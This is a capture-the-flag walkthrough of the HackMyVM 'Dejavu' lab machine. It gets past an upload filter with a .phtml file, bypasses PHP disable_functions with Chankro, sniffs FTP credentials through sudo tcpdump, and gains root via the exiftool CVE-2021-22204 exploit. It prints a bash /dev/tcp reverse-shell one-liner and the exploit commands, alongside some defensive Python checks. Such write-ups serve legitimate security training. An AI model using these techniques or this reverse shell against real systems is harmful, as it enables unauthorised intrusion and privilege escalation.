
Writeup – HackMyVM’s Dejavu Walkthrough

Dejavu is an easy machine from HackMyVM by the user InfayerTS. The machine includes basic vulnerabilities. First, we find a hidden path in a page’s source. Then, we have a file upload form whose extension filter misses one executable extension, together with a browsable directory for the uploads. However, PHP’s disable_functions blocks the usual ways of spawning a process, which makes getting a reverse shell harder.

Link to the machine

Step 1: Get the IP address

As always, I started the enumeration by identifying the IP address of the target machine.

❯ sudo netdiscover -r 10.0.0.0/24
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.0.0.1        52:54:00:12:35:00      1      60  Unknown vendor
 10.0.0.2        52:54:00:12:35:00      1      60  Unknown vendor
 10.0.0.3        08:00:27:0e:4f:55      1      60  PCS Systemtechnik GmbH
 10.0.0.152      08:00:27:3b:66:78      1      60  PCS Systemtechnik GmbH

Here, the IP address of the target is 10.0.0.152 whereas that of the attacker is 10.0.0.4 (not shown here).

Step 2: Scan services on the target

Next, I scanned the services on the target that we can access from the network.

❯ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-28 22:36 +0545
Nmap scan report for 10.0.0.152
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:8f:5b:43:62:a1:5b:41:6d:7b:6e:55:27:bd:e1:67 (RSA)
|   256 10:17:d6:76:95:d0:9c:cc:ad:6f:20:7d:33:4a:27:4c (ECDSA)
|_  256 12:72:23:de:ef:28:28:9e:e0:12:ae:5f:37:2e:ee:25 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The SSH banner shows that the operating system is Ubuntu 20.04 (Focal) (https://packages.ubuntu.com/focal-updates/ssh). Likewise, we have an HTTP port to enumerate further.

Step 3: Dig into the HTTP webserver

The landing page is just the Apache default page, so I performed directory busting.

❯ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.0.152/ -o common.log
/.hta                 (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 10918]
/info.php             (Status: 200) [Size: 69927]
/server-status        (Status: 403) [Size: 275]

This cursory scan exposed a PHP info file. In it, we see that some functions are disabled (disable_functions).

PHP Info shows some functions are restricted

That becomes important later. For now, the source of the index page reveals a path.

<html>
<body>
<!-- /S3cR3t -->
</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
<!------------- redacted -------------->

The path “/S3cR3t” has directory listing enabled, so we can browse its contents.

Now, the first hurdle is to identify an upload extension that the filter lets through but Apache still executes as PHP. The “.phtml” extension does the job: Ubuntu’s Apache PHP module configuration hands “.phtml” (and “.phar”) files to the PHP engine just like “.php”, so a filter that only blocks “.php” is incomplete.

Reference: https://book.hacktricks.xyz/pentesting-web/file-upload#file-upload-general-methodology
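As an added example that is not from the original post, the following Python contrasts the kind of deny-list check the upload form evidently used with an allow-list check; the PHP_HANDLER pattern mirrors the FilesMatch rule in Ubuntu’s libapache2-mod-php configuration, and the file names are constructed.

```python
import os
import re

# Extensions Ubuntu's libapache2-mod-php hands to the PHP engine (its FilesMatch rule).
PHP_HANDLER = re.compile(r"\.ph(ar|p|tml)$")

# A deny-list like the one the upload form evidently used: it forgets .phtml and .phar.
NAIVE_DENY_LIST = {"php"}

# What a hardened uploader should do instead: accept only known-safe extensions.
IMAGE_ALLOW_LIST = {"png", "jpg", "jpeg", "gif"}

# One base name, exactly one lower-case extension, no path separators, extra dots or spaces.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[a-z0-9]{1,5}$")


def extension_of(filename: str) -> str:
    """Return the lower-cased final extension without the dot ('' if none)."""
    return os.path.splitext(filename)[1].lstrip(".").lower()


def denylist_accepts(filename: str) -> bool:
    """The broken check: reject only extensions listed in NAIVE_DENY_LIST."""
    return extension_of(filename) not in NAIVE_DENY_LIST


def allowlist_accepts(filename: str) -> bool:
    """Hardened check: strict name shape, a single extension, allow-listed type."""
    name = os.path.basename(filename)  # drop any directory components
    if not SAFE_NAME.match(name):
        return False                   # rejects 'a.jpg.phtml', 'a b.png', '.htaccess', ...
    return extension_of(name) in IMAGE_ALLOW_LIST


def would_execute(filename: str) -> bool:
    """Would Apache run this file as PHP if it landed under the document root?"""
    return PHP_HANDLER.search(os.path.basename(filename)) is not None


if __name__ == "__main__":
    for f in ["photo.jpg", "shell.php", "shell.phtml", "photo.jpg.phtml"]:
        print(f"{f:16} denylist={denylist_accepts(f)!s:5} "
              f"allowlist={allowlist_accepts(f)!s:5} executes={would_execute(f)}")
```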

Since the functions that spawn processes are disabled, we cannot directly spawn a shell. However, there are ways to bypass that. Here, I am going to use a simple exploit with the tool Chankro. The problem is that the project has not been maintained for a long time and there is no Python 3 version of it. Thus,

Reference: https://infosecwriteups.com/how-i-bypassed-disable-functions-in-php-to-get-a-remote-shell-48b827d54979

https://www.tarlogic.com/blog/how-to-bypass-disable_functions-and-open_basedir/

Please check the above links for the details. In short, the “mail” function is not disabled here, and Chankro abuses that: mail() makes PHP spawn the sendmail binary, and because putenv() can set LD_PRELOAD, a shared object is loaded into that child process, where PHP’s disable_functions no longer applies.

The link to the script is: https://github.com/kriss-u/chankro-py3

For the exploit, I created a simple reverse shell file.

bash -c 'bash -i >& /dev/tcp/10.0.0.4/9001 0>&1'

The next step is to run the script. Note that the document root is “/var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats”, so the path passed to Chankro must include it.

Document root
❯ python3 chankro.py --arch 64 --input rev.sh --output shell.phtml --path /var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats/S3cR3t/files/


     -=[ Chankro ]=-
    -={ @TheXC3LL }=-


[+] Binary file: rev.sh
[+] Architecture: x64
[+] Final PHP: shell.phtml


[+] File created!

It creates a .phtml file that spawns a reverse shell; in my case, the listener is on port 9001.

❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001

That’s all we need. Now, we upload the output file and open its link in the files directory. That gets us a shell.

❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.152.
Ncat: Connection from 10.0.0.152:36554.
bash: cannot set terminal process group (747): Inappropriate ioctl for device
bash: no job control in this shell
<nMostCriticalInternetSecurityThreats/S3cR3t/files$

Lastly, I upgraded this dumb shell to a fully interactive one.

Upgrade to an intelligent reverse shell

Step 4: Sudo abuse tcpdump

Once we get the shell, we have to check the sudo permissions.

www-data@dejavu:/$ sudo -l
Matching Defaults entries for www-data on dejavu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on dejavu:
    (robert) NOPASSWD: /usr/sbin/tcpdump

The output above shows that www-data can run tcpdump as the user robert. After this, I checked GTFOBins, but it didn’t give me a shell at all.

Reference: https://gtfobins.github.io/gtfobins/tcpdump/#sudo

The next thing to do was to listen to the traffic. To be certain of what to capture, I used pspy64 to snoop on the processes. I noticed that a script (/home/robert/auth.sh) logged in to the local FTP server at regular intervals.

2022/05/29 05:48:01 CMD: UID=1000 PID=11992  | /bin/sh -c /home/robert/auth.sh 
2022/05/29 05:48:01 CMD: UID=1000 PID=11994  | ftp -n localhost 
2022/05/29 05:48:01 CMD: UID=1000 PID=11993  | /bin/sh /home/robert/auth.sh 
2022/05/29 05:48:01 CMD: UID=65534 PID=11996  | /usr/sbin/vsftpd /etc/vsftpd.conf 
2022/05/29 05:48:01 CMD: UID=0    PID=11995  | /usr/sbin/vsftpd /etc/vsftpd.conf 

Thus, I knew which port to listen on. Because the FTP client connects to localhost, we also have to capture on the loopback interface. After some time, we capture a login.

www-data@dejavu:/tmp$ sudo -u robert tcpdump -i lo port ftp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
# Redacted
05:52:01.840340 IP localhost.60932 > localhost.ftp: Flags [P.], seq 1:14, ack 21, win 512, options [nop,nop,TS val 2022967189 ecr 2022967189], length 13: FTP: USER robert
05:52:01.840546 IP localhost.ftp > localhost.60932: Flags [.], ack 14, win 512, options [nop,nop,TS val 2022967190 ecr 2022967189], length 0
05:52:01.841224 IP localhost.ftp > localhost.60932: Flags [P.], seq 21:55, ack 14, win 512, options [nop,nop,TS val 2022967190 ecr 2022967189], length 34: FTP: 331 Please specify the password.
05:52:01.841237 IP localhost.60932 > localhost.ftp: Flags [.], ack 55, win 512, options [nop,nop,TS val 2022967190 ecr 2022967190], length 0
05:52:01.841636 IP localhost.60932 > localhost.ftp: Flags [P.], seq 14:32, ack 55, win 512, options [nop,nop,TS val 2022967191 ecr 2022967190], length 18: FTP: PASS #Password redacted 
05:52:01.842203 IP localhost.ftp > localhost.60932: Flags [.], ack 32, win 512, options [nop,nop,TS val 2022967191 ecr 2022967191], length 0
05:52:01.870378 IP localhost.ftp > localhost.60932: Flags [P.], seq 55:78, ack 32, win 512, options [nop,nop,TS val 2022967219 ecr 2022967191], length 23: FTP: 230 Login successful.
# Redacted everything
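The capture above is also what a defender should be looking for. As an added Python example (not part of the original writeup or of any tool it uses), this parses tcpdump’s decoded FTP lines in the format shown and flags logins whose password crossed the wire in clear text; the sample lines are constructed in that format with a placeholder password.

```python
import re
from dataclasses import dataclass
# Matches the decoded FTP payload lines tcpdump prints for a 'port ftp' capture.
FTP_LINE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>\S+) > (?P<dst>\S+): .*FTP: (?P<msg>.*)$"
)
SERVER_SUFFIXES = (".ftp", ".21")   # service name (default) or port number (tcpdump -n)

@dataclass
class FtpLogin:
    client: str
    user: str = ""
    password_seen: bool = False   # a PASS command crossed the wire in clear text
    outcome: str = "pending"      # 'success' (230), 'failure' (530) or 'pending'

def parse_ftp_logins(lines):
    """Reconstruct FTP authentication attempts from tcpdump's text output."""
    sessions = {}                 # client socket -> FtpLogin
    for line in lines:
        m = FTP_LINE.match(line.strip())
        if not m:
            continue              # bare ACKs, comments and non-FTP lines carry no payload
        src, dst, msg = m["src"], m["dst"], m["msg"].strip()
        if dst.endswith(SERVER_SUFFIXES):            # client -> server command
            verb, _, arg = msg.partition(" ")
            if verb.upper() == "USER":
                sessions[src] = FtpLogin(client=src, user=arg)
            elif verb.upper() == "PASS" and src in sessions:
                sessions[src].password_seen = True
        elif src.endswith(SERVER_SUFFIXES) and dst in sessions:   # server -> client reply
            code = msg[:3]
            if code == "230":
                sessions[dst].outcome = "success"
            elif code == "530":
                sessions[dst].outcome = "failure"
    return list(sessions.values())

def exposed_credentials(lines):
    """(client, user) pairs whose clear-text password led to a successful login."""
    return [(s.client, s.user) for s in parse_ftp_logins(lines)
            if s.password_seen and s.outcome == "success"]

# Constructed sample in the format of the capture above; the password is a placeholder.
SAMPLE_CAPTURE = """\
05:52:01.840340 IP localhost.60932 > localhost.ftp: Flags [P.], seq 1:14, ack 21, length 13: FTP: USER robert
05:52:01.841224 IP localhost.ftp > localhost.60932: Flags [P.], seq 21:55, ack 14, length 34: FTP: 331 Please specify the password.
05:52:01.841636 IP localhost.60932 > localhost.ftp: Flags [P.], seq 14:32, ack 55, length 18: FTP: PASS PLACEHOLDER
05:52:01.870378 IP localhost.ftp > localhost.60932: Flags [P.], seq 55:78, ack 32, length 23: FTP: 230 Login successful.
""".splitlines()
```

Feeding it a live capture (tcpdump -i lo port ftp, with -n or without) lists every account whose password is recoverable by anyone who can sniff that interface.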

The captured password also works for SSH as the user robert.

Escalate to root

The sudo permissions show that robert can execute exiftool as root. As the machine’s name hints, this exiftool is vulnerable to CVE-2021-22204, a code-execution bug in its DjVu handling.

Reference: https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/

The installed version is 12.23, which is vulnerable.

robert@dejavu:/tmp$ exiftool -ver
12.23

The link to the exploit: https://github.com/convisolabs/CVE-2021-22204-exiftool

robert@dejavu:/tmp$ git clone https://github.com/convisolabs/CVE-2021-22204-exiftool
Cloning into 'CVE-2021-22204-exiftool'...
remote: Enumerating objects: 27, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 27 (delta 6), reused 17 (delta 2), pack-reused 0
Unpacking objects: 100% (27/27), 52.51 KiB | 363.00 KiB/s, done.
robert@dejavu:/tmp$ cd CVE-2021-22204-exiftool/
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ ls
configfile  exploit.py  image.jpg  lab  README.md
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ vim exploit.py 
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ python3 exploit.py 
    1 image files updated
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ ls
configfile  exploit.djvu  exploit.py  image.jpg  image.jpg_original  lab  payload  payload.bzz  README.md
robert@dejavu:/tmp/CVE-2021-22204-exiftool$ sudo exiftool exploit.djvu

The only change needed in exploit.py is the listener IP address and port. Running sudo exiftool on the crafted DjVu file gave us a root shell.

❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.152.
Ncat: Connection from 10.0.0.152:60938.
# id
uid=0(root) gid=0(root) groups=0(root)
# 